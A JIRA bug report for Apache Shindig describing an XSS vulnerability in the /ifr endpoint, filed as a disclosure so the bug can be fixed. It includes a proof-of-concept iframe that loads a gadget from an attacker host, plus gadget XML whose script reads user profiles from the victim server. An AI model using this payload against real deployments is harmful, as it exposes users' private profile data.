Posted to issues@shindig.apache.org by "M. van Cuijk (JIRA)" <ji...@apache.org> on 2013/01/29 10:11:13 UTC

[jira] [Created] (SHINDIG-1898) XSS vulnerability through /ifr

M. van Cuijk created SHINDIG-1898:
-------------------------------------

             Summary: XSS vulnerability through /ifr
                 Key: SHINDIG-1898
                 URL: https://issues.apache.org/jira/browse/SHINDIG-1898
             Project: Shindig
          Issue Type: Bug
            Reporter: M. van Cuijk


When a gadget contains JavaScript, it will be run in the domain context of the Shindig application, since the gadget is loaded through /ifr on the Shindig host. Therefore, gadgets are capable of doing HTTP requests to any URI on this host.

Loading a gadget through /ifr is controlled by the "url" query string parameter, but no restrictions are placed on the value of this parameter. Only the URL of gadgets that have previously been added to the container by the user should be allowed for this parameter. Any other URL should result in an error.

The current situation allows an attacker to trick a user into opening a website on any domain, including an iframe like this one:

<iframe src="https://shindighost/gadgets/ifr?url=http%3A%2F%2Fattackerhost%2Fexploit.gadget.xml&amp;container=default&amp;view=canvas&amp;nocache=1"></iframe>

Since the "url" parameter is not required to point to a gadget that has been added by the user, any URL is accepted. Any JavaScript code that is contained in the gadget is capable of doing HTTP requests to URIs under https://shindighost/, e.g. with code like this:

<Module>
	<ModulePrefs title="Exploit" description="P0wned!" author="Mark van Cuijk" width="60" height="140">
	</ModulePrefs>
	<Content type="html" view="canvas">
	<![CDATA[<!DOCTYPE html>
		<script type="text/javascript" src="https://shindighost/webresources/js/lib/jquery.min.js"></script>
		<script type="text/javascript">
			$(function() {
				$.ajax({
					url: 'https://shindighost/rest/userprofiles',
					success: function(d) {
						var t = d.length + ' profiles found.\n'
							+ 'First profile: '
							+ d[0].openId;
						window.alert(t);
					}
				});
			});
		</script>
	]]>
	</Content>
</Module>

Now, when an authenticated user is pointed to the URL containing the iframe above, the actual result is that a popup is displayed showing the total number of user profiles in the application server and the OpenID identifier of the first profile returned. The desired result is that no popup is displayed, because the gadget and therefore the JavaScript is not loaded in the iframe in the first place.
